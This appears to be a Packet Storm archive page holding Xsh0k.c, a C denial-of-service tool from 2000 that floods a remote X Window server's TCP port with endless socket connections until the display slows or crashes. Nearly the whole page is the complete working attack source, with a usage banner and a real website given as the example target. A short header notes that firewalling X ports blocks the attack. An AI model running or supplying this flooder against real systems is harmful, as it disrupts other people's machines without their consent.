Xwindows remote dos attack - creates a sequence of socket connections to tcp port 6000. Xwindows slows to a crawl and sometimes does not respond to user input.
efe31e621870f97e050c9ccd97b857ea4370bb4acee4752fe8205face4d0fa94
/* 2/5/00 1.0
Xsh0k.c by n0rby -- NeURaL CoLLaPsE CrEw.
main code by AcidCrash -- NeURaL CoLLaPsE CrEw.
This dos simply creates a sequence of socket connections to Xwindow port
of a remote server. This cause a very disturbing effect to the XWindow user.
There are many and various effects: frequently Xwindow slows so much that
it's quite impossible to start new X programs; sometimes Xwindow don't
recognizes some keys or mouse input, and, more rarely it crash and
leave the user to the bash.
A good metod to patch this vulnerability is to use a firewall to filter
Xwindow ports. Therefore if you attack a filtered box with this dos, there
there will be no effect.
This dos was created to test Xwindow stability on *nix machines.
It's coded for the flat line project
and the NeURaL CoLLaPsE CrEw -- www.ncl.cjb.net
acidcrash@ncl.cjb.net norby@ncl.cjb.net
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
struct sockaddr_in addr;
char host[99+1];
struct hostent *hp;
int a,b,c,d;
int port;
int err;
int sock_stat;
/* Main ^__^ */
int main(int argc, char *argv[]) {
if (argc > 3 || argc == 1) {
printf("\n\033[1;32m Xsh0k.c \033[0m>> by \033[32m\\\033[0m\033[1;32mn0rby\033[0m\033[32m\\\033[0m");
printf("\n >> main code by \033[32mA\033[0m\033[1;32mcid\033[0m\033[32mC\033[0m\033[1;32mrash\n");
printf("\n\033[1;32musage:\033[0m %s <\033[1;32mhost\033[0m> [\033[1;32mdisplay\033[0m]\n", argv[0]);
printf("\n\033[1;32mexample to attack a XWindows on third display (port 6003):\n");
printf(" \033[0m%s \033[1;32mwww.forza-italia.it\033[0m 3", argv[0]);
printf("\n\n[\033[1;32mdisplay\033[0m] = display to \033[1;32mfl\033[0m\033[32moo\033[0m\033[1;32md\033[0m. Default \033[1;32m:0\033[0m (port 6000)\n\n");
}
else {
/* networking */
if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) !=4)
{
hp = gethostbyname(argv[1]);
/* error check */
if (hp == NULL)
{
perror("\nAn error is occurred in host resolving");
printf("Checking: errno=%d\n",errno);
exit(0);
}
/* continue */
sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
(unsigned char)hp->h_addr_list[0][1],
(unsigned char)hp->h_addr_list[0][2],
(unsigned char)hp->h_addr_list[0][3]);
}
else
{
strncpy(host,argv[1],99);
}
/* setting display */
if (argc == 2) { port = 6000; }
if (argc == 3) { port = (atoi(argv[2]) + 6000); } // Tnx to Torkemada 4 the help
/* Banner flooding */
printf("\n\033[1;32m Xsh0k.c \033[0m>> by \033[32m\\\033[0m\033[1;32mn0rby\033[0m\033[32m\\\033[0m");
printf("\n >> main code by \033[32mA\033[0m\033[1;32mcid\033[0m\033[32mC\033[0m\033[1;32mrash\n");
printf("\nkilling \033[32mX\033[0m\033[1;32mwindows\033[0m on \033[1;32m%s\033[0m, ", argv[1]);
if (argc == 2) { printf("display \033[1;32m:0\033[0m"); }
else { printf("display \033[1;32m:%s\033[0m", argv[2]); }
printf("\n\n\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m");
printf("\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m");
printf("\033[1;32mF\033[0m\033[32mL\033[1;32ma\033[0m\033[32mT"); // Flat
printf(" \033[1;32mL\033[0m\033[32mi\033[1;32mN\033[0m\033[32me"); // Line
/* flood cicle */
for(;;)
{
sock();
fflush(stdout);
}
}
}
/* socket opening... */
int sock()
{
sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock_stat < 0)
{
perror("\nAn error is occurred in port opening");
printf("Checking: errno=%d\n",errno);
exit(2);
}
addr.sin_family = PF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(host);
err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
if (err < 0) {
printf("\033[1;32m H\033[0m\033[32ma\033[0m\033[1;32mS"); // has
printf(" \033[0m\033[1;32mF\033[0m\033[32mo\033[0m\033[1;32mU\033[0m\033[32mn\033[0m\033[1;32mD"); // found
printf(" \033[0m\033[1;32mA\033[0m\033[32mn \033[0m"); //an
printf("\033[1;32mE\033[0m\033[32mr\033[0m\033[1;32mr\033[0m\033[32mo\033[0m\033[1;32mr\033[0m\033[32m.\033[0m\033[1;32m.\033[0m\033[32m.\n"); //err
perror("\033[32m");
printf("\033[0m\n");
exit(0);
}
printf("\033[1;32m_\033[0m");
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed